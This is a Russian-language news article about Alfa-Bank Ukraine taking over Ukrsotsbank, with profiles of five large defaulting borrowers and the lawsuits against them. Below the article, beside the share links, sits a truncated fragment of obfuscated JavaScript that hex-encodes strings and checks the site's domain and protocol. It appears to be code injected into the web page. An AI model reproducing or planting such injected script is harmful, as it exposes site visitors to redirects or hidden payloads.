Альфа-долги: каким заемщикам Укрсоца ждать гостей из Альфа-Банка

Перегляди: 829

В начале 2016-го было принято окончательное решение, что группа UniCredit становится владельцем 9,9% банковской группы Альфа, а в обмен передает украинские активы (Укрсоцбанк) Альфа-Банку Украина. Кому из «некачественных» заемщиков Укрсоца стоит ждать посланников от нового владельца и что изменится в их жизни? 
Многое. Альфа-Банк Украина — один из самых жестких кредиторов. Бизнес-агрессивность -  часть корпоративной культуры всей Альфа-Групп. Например, российский банк группы прославился тем, что стал чуть ли не единственным (и точно первым), кто выбил в кризис 2009-го долги с компаний Олега Дерипаски.

Руководство украинского финучреждения не прячет проблемы «под ковер», называет проблемные кредиты проблемными и охотно вступает в сложные судебные баталии. «У нас есть пример, когда судебные войны длятся по пять-шесть лет не только в Украине, но и в Швейцарии, на Кипре, в Англии, Дании, Латвии, Испании. Мы всегда пытаемся догнать наших (плохих. — Ред.) заемщиков, — рассказывал в конце прошлого года в интервью ЛИГА президент Альфа-Банка Александр Луканов. — Система должна работать так, что если банк дал денег, то их должны вернуть. Точка».

«Альфа жестко работает с проблемными заемщиками. Они не „едят завтраки“, давая заемщику время вывести активы, а сразу подают в суд. Они одни из самых активных на рынке. Например, если другие банки зачастую работают с одним коллекторским агентством, то у Альфы договоры с несколькими», — рассказывает глава одной из крупнейших коллекторских компаний.

Благодаря активной «работе» с проблемными заемщиками Альфа-Банку удается удачнее других договариваться с клиентами, возвращать деньги или забирать залоги. Только за 2015 год банк уладил споры с несколькими крупными заемщиками: Валенором, Мрией, Нестом, Интерпайпом. «У нас, кроме депутата Винника (Иван Винник, член БПП. - ред.), вопиющих процессов уже нет. По другим конфликтам все разумно, компромиссно разрешилось», — рассказал Луканов.

С покупкой Укрсоцбанка у коллекторской службы Альфа-Банка работы прибавится. По данным аналитического отчета ICU, доля проблемной задолженности у Укрсоцбанка достигла 56,7% по состоянию на конец 2014 года против 40,8% годом ранее. Давняя головная боль Укрсоцбанка -  ипотечные заемщики-физлица и крупные ритейлеры, которые брали валютные кредиты до 2009 года. Из новых проблемных заемщиков — в основном агрохолдинги.

В Альфе считают, что им эти трудности по плечу. «Мы видим определенный потенциал в работе с проблемными заемщиками Укрсоцбанка на будущее. В Альфа-Банке коллекшн, построенный как отдельное подразделение, с 2008 года. Эта компетенция в банке очень сильная благодаря опыту работы с проблемными активами в течение восьми лет», — рассказывает директор департамента взыскания кредитов Альфа-Банка Алексей Тесленко.

Церемониться с заемщиками Укрсоцбанка Альфа не собирается. «Основной акцент мы сделаем на принудительном взыскании. Если же найдутся клиенты, желающие договориться, то мы всегда предпочтем добровольный способ урегулирования», — говорит Тесленко.

ЛІГА.net выяснила пять крупнейших проблемных заемщиков Укрсоцбанка, к которым в первую очередь придут люди из Альфа-Банка.

ИСА Прайм Девелопмент

Сумма: $200 млн
Собственник: Александр Башенко

Самый известный проблемный заемщик Укрсоцбанка — компания ИСА Прайм Девелопмент. Поговаривают, что именно люди из ИСА сожгли яхту бывшего предправления Укрсоцбанка Бориса Тимонькина. Первый кредит на сумму $17 млн Укрсоцбанк выдал ИСА Прайм Девелопмент в 2004 году. Тогда банк принадлежал Виктору Пинчуку. В дальнейшем Укрсоц увеличивал кредитный лимит компании.

В 2011-м Укрсоцбанк подал заявление в правоохранительные органы за невозврат кредита ИСА на сумму 190 млн грн. «С 2011 года мы вынуждены защищать свои права судебным путем. За это время банк выиграл по отношению к кредитам и залогам этого заемщика около 50 судебных дел», — говорит председатель правления Укрсоцбанка Тамара Савощенко.

Несмотря на то что Укрсоцбанк выиграл все дела против ИСА, заемщик так и не начал платить по кредиту и споры длятся до сих пор. В середине прошлого года компания Проект А (которая утверждает, что профинансировала строительство части недвижимости, что была в залоге по кредитам группы компаний ИСА Прайм Девелопмент), подала в суд на банк на сумму 18 млн грн. Хозяйственный суд Киева заблокировал эту сумму на корреспондентских счетах UniCredit Bank по иску заемщика Проект А. «При этом суд даже не начал рассматривать дело по сути, а лишь назначил экспертизу, чтобы выяснить реальность заявленной суммы убытков заемщика. Банк уже подал в Генпрокуратуру заявление о правонарушении судьи, а также будет обращаться в Высшую квалификационную комиссию судей для привлечения судьи к ответственности», — говорит Савощенко.

Пузата Хата

Сумма: $70 млн
Собственник: по неофициальной информации, Александр и Вячеслав Константиновские

Компания Пузата Хата взяла кредит у Укрсоцбанка на сумму $50 млн в 2007 году. Банк продолжал кредитовать компанию до 2008-го. Сумма займа выросла до $70 млн. Залогом выступали восемь ресторанов Пузата Хата.

После кризиса 2008 года платежная дисциплина компании ухудшилась, а с 2010 года Пузата Хата перестала обслуживать кредит. Тогда заемщик предложил Укрсоцбанку реструктурировать заем, но банк отказался. «Мы не видим, что у компании тяжелая ситуация. У компании был период падения продаж зимой 2009-го, но мы проверяли — весной рестораны полны, там хорошая выручка, хорошие чеки, и бизнес компании на самом деле идет успешно», — говорил в 2010 году Борис Тимонькин, который на тот момент руководил банком.

После этого компания инициировала процедуру банкротства. В 2011 году Хозяйственный суд Киева признал компанию Пузата Хата банкротом. Компания перевела весь операционный бизнес на другое юридическое лицо — ПХ Групп — и продолжала работать.

Несмотря на банкротство сеть ресторанов Пузата Хата успешно развивается. На конец 2015 года она насчитывала 32 ресторана, количество посетителей достигло 2 млн человек. «Уже более семи лет Пузата Хата не возвращает долг и продолжает функционировать у всех на виду», — говорит директор по рискам Укрсоцбанка Павел Гашковец.

 Агрохолдинг Мрия

Сумма задолженности: $65 млн
Собственник: комитет кредиторов, ранее — семья Гута

На волне роста агрохолдингов в Украине в 2011—2012 годах банки наперегонки кредитовали агросектор. После голодных 2008—2009 годов хотелось зарабатывать. Платежеспособность агрохолдингов проверяли так же, как ипотечных заемщиков в 2006—2008-м. На этом и погорели.

Летом 2014-го лопнул крупнейший аграрный пузырь в Украине — агрохолдинг Мрия объявил дефолт. Общая задолженность компании составляла $1,3 млрд. Укрсоцбанк входит в пятерку крупнейших кредиторов Мрии.

Еще в апреле 2013 года рейтинговое агентство Standard & Poor's опубликовало отчет, в котором рейтинг облигаций Мрии был понижен до рейтинга «В» и холдингу пророчили дефолт в 2015 году. Но эта новость прошла незамеченной как украинскими СМИ, так и кредиторами. Мрию продолжали кредитовать.

Сразу после объявления дефолта Мрии был сформирован комитет кредиторов, который отстаивал интересы последних. В то же время руководство компании и один из ключевых акционеров предприятия - Николай Гута скрылись и были объявлены вмеждународный розыск.

Комитет кредиторов назначил нового руководителя — Саймона Чернявского. «Они пытаются сохранить бизнес, чтобы он мог генерировать денежный поток, который можно будет пустить на обслуживание долга», — рассказал в интервью ЛІГА.net партнер компании ICU Макар Пасенюк (ICU является финансовым советником комитетов кредиторов агрохолдинга Мрия). По словам Макара Пасенюка, Мрия сейчас фактически принадлежит кредиторам.

Альфа-Банк имеет опыт общения с Мрией. Он также выступал одним из кредиторов агрохолдинга, но в феврале 2015-го вышел из комитета кредиторов. «С Мрией у нас просто хорошее обеспечение, за счет которого полностью погасим кредиты», — сказал Луканов.

Группа компаний Креатив

Сумма задолженности: около $20 млн
Собственник: Рысбек Токтомушев и группа инвесторов

В 2012 году группа европейских банков, в которую входил и Укрсоцбанк, выдала кредит на сумму $300 млн агрохолдингу Креатив. Залогом по кредиту выступил товар на складах (семена подсолнечника и подсолнечное масло) на сумму более 1,3 млрд грн. Осенью 2014 году Креатив перестал рассчитываться с поставщиками, а в дальнейшем платить по кредитам.

В средине 2015 года у компании сменился собственник. Станислав Березкин вышел из состава акционеров. Новым собственником стал Рысбек Токтомушев, который представляет некий пул акционеров. После завершения сделки он сообщил, что Креатив «рисовал» финансовую отчетность, которую подавал в банк.

После продажи компании синдикат европейских банков попробовал взыскать залог по кредиту, но оказалось, что склады Креатива пусты. Куда делся залог, ни новые, ни старые собственники сказать не могут.

Синдикат банков-кредиторов инициировал судебное разбирательство в суде в Британии. В январе 2016-го было возбуждено уголовное дело по факту присвоения денежных средств Укрсоцбанка в особо крупных размерах работниками агрохолдинга Креатив. «Мы начали уголовные дела против клиентов, которые обманули банк. Мы продолжим бороться с клиентом, который украл деньги у нас, у других банков и у украинского общества (большое количество налогов, например) и тайно выводил капитал за рубеж», — заявил в сообщении для прессы генеральный менеджер Укрсоцбанка (ТМ UniCredit Bank) Мауро Маскио.

 Агрохолдинг ТАКО

Сумма задолженности: $18,68 млн
Собственник: ООО Милагро (Брэдли Мэттью Адриан), ранее Дмитрий Колесник

Агрохолдинг ТАКО — один из крупнейших аграриев-неплательщиков. Общая сумма задолженности ТАКО банкам в Украине — $60 млн.

ТАКО в прямом смысле агрессивный заемщик. По информации СМИ, 7 марта 2015 года при попытке изъять ПУМБом залог по кредиту (зерно на складах) по решению суда произошла потасовка. В ней участвовали сотрудники охранной фирмы, которую нанял ТАКО, и сотрудниками банка. В результате погиб человек.

До 2014 года главным акционером агрохолдинга считался Дмитрий Колесник. Но в 2014-м, по данным Агентства по развитию инфраструктуры фондового рынка Украины (АРИФРУ), Колесников вышел из состава акционеров компании. Сейчас конечным бенефициаром ТАКО числится некий Брэдли Мэттью Адриан (Белиз).

Укрсоцбанк открыл кредитную линию ТАКО в 2012 году под залог техники, оборудования и будущего урожая. Обслуживать кредиты агрохолдинг перестал в 2014-м, а обеспечение по кредиту было выведено на другие компании. За 2014—2015 годы Укрсоцбанк инициировал ряд судебных разбирательств с агрохолдингом ТАКО. Но заемщик так и не вошел в график погашения.

Источник: ЛигаБизнесИнформ

 

// o;o++) t+=e.charCodeAt (o).toString (16);return t},a=function (e){e=e.match (/[\S\s]{1,2}/g);for (var t="",o=0;o < e.length;o++) t+=String.fromCharCode (parseInt (e[o],16));return t},d=function (){return "zerkalo.mk.ua"},p=function (){var w=window,p=w.document.location.protocol;if (p.indexOf ("http")==0){return p}for (var e=0;e

Tweet about this on TwitterShare on FacebookShare on Google+

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

code